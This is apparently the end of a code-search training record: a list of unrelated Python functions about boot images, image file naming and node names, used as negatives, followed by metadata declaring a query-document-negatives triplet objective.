"def _prepare_boot_iso(self, task, root_uuid=None):\n node = task.node\n d_info = redfish_boot._parse_deploy_info(node)\n\n kernel_href = node.instance_info.get('kernel')\n ramdisk_href = node.instance_info.get('ramdisk')\n\n if not kernel_href or not ramdisk_href:\n\n image_href = d_info['image_source']\n\n image_properties = (\n images.get_image_properties(\n task.context, image_href, ['kernel_id', 'ramdisk_id']))\n\n if not kernel_href:\n kernel_href = image_properties.get('kernel_id')\n\n if not ramdisk_href:\n ramdisk_href = image_properties.get('ramdisk_id')\n\n if not kernel_href or not ramdisk_href:\n raise exception.InvalidParameterValue(_(\n \"Unable to find kernel or ramdisk for \"\n \"to generate boot ISO for %(node)s\") %\n {'node': task.node.uuid})\n\n bootloader_href = d_info.get('bootloader')\n\n return self._prepare_iso_image(\n task, kernel_href, ramdisk_href, bootloader_href,\n root_uuid=root_uuid)",
"def uefi_firmware_name(self):\n locator = (By.XPATH, \"//*[@id='app-psp-downloads']/section/div[2]/div[2]/div/div/div[2]/div[3]/div/div/div/ul/li[1]/p/strong\")\n return BaseElement(self.driver, locator[0], locator[1])",
"def image_name(self, image_id: int):\n image_id_expanded = \"0\" * (12 - len(str(image_id))) + str(image_id)\n if self.mode == \"train\":\n return \"COCO_train2014_\" + image_id_expanded + \".jpg\", \"COCO_val2014_\" + image_id_expanded + \".jpg\"\n elif \"2018\" in self.mode:\n return \"VisualDialog_\" + self.mode + \"_\" + image_id_expanded + \".jpg\"\n elif \"2014\" in self.mode:\n return \"COCO_\" + self.mode + \"_\" + image_id_expanded + \".jpg\"\n else:\n raise FileNotFoundError",
"def getImageBaseName(self):\r\n return \"Tiles/{0}.png\".format(self.imageBaseName)",
"def volume_get_root_name(self):\n return self.request( \"volume-get-root-name\", {\n }, {\n 'volume': [ basestring, False ],\n } )",
"def vm_bootdisk_file_name(self):\n return self._vm_bootdisk_file_name",
"def _GenerateImageNameFromLocalPath(self, image):\n realpath = osutils.ExpandPath(image)\n if not realpath.endswith('.bin'):\n raise CustomImageStagingException(\n 'Image path: %s does not end in .bin !' % realpath)\n build_name = os.path.basename(os.path.dirname(realpath))\n # Custom builds are name with the suffix of '-a1' but the build itself\n # is missing this suffix in its filesystem. Therefore lets rename the build\n # name to match the name inside the build.\n if build_name.endswith('-a1'):\n build_name = build_name[:-len('-a1')]\n\n if not self.board:\n self.board = os.path.basename(os.path.dirname(os.path.dirname(realpath)))\n return CUSTOM_BUILD_NAME % dict(board=self.board, build=build_name)",
"def _ecr_image_name_prepared(container_info: Dict) -> str:\n image_name = container_info.get('image')\n if \":\" not in image_name:\n image_name = \"%s:latest\" % image_name\n if not container_info.get('create_image') and \".dkr.ecr.\" in image_name:\n logger.info('Image already prepared in ECR.')\n return image_name\n return None",
"def get_image_filename(filename):\n base_filename=os.path.basename(filename)\n dir_filename=os.path.dirname(filename)\n rootname,ext=base_filename.split('.')\n splitrootname=rootname.split('_')\n fn=splitrootname[0]+'_'+splitrootname[1]+'_'+splitrootname[2]+'.'+ext\n tag=splitrootname[1]+'_'+splitrootname[2]\n return fn,tag",
"def boot_image(self) -> 'outputs.BootImageResponse':\n return pulumi.get(self, \"boot_image\")",
"def get_boot_file_template():\n return ''",
"def computer_name():\n return \"The name of this computer is \" + platform.node()",
"def nameRoot(node):\r\n\r\n result = node.replace(mel.eval('match( \".*|\", \"%s\" )' % node), \"\")\r\n sn = result.replace(mel.eval('match( \".*:\", \"%s\" )' % result), \"\")\r\n return sn",
"def current_filename(self):\n return \"%s_%s_%s.png\" % (LABELS[self.metadata['creating_entity']],\n SECTORS[self.metadata['sector']],\n CHANNELS[self.metadata['channel']])"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
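The metadata blocks above declare a "triplet" objective over (query, document, negatives) rows. As a minimal, illustrative sketch only: the snippet below shows one way such rows could be parsed into triplets, assuming they are stored as JSON lines with "query", "document", and "negatives" fields; the file name records.jsonl and those field names are assumptions for illustration, not something stated in this dump.

import json

def load_triplets(path="records.jsonl"):
    # Hypothetical loader: each JSON line is expected to carry one record with
    # a natural-language "query", a positive code "document", and a list of
    # hard-negative code snippets under "negatives".
    triplets = []
    with open(path, encoding="utf-8") as fh:
        for line in fh:
            row = json.loads(line)
            triplets.append((row["query"], row["document"], row["negatives"]))
    return triplets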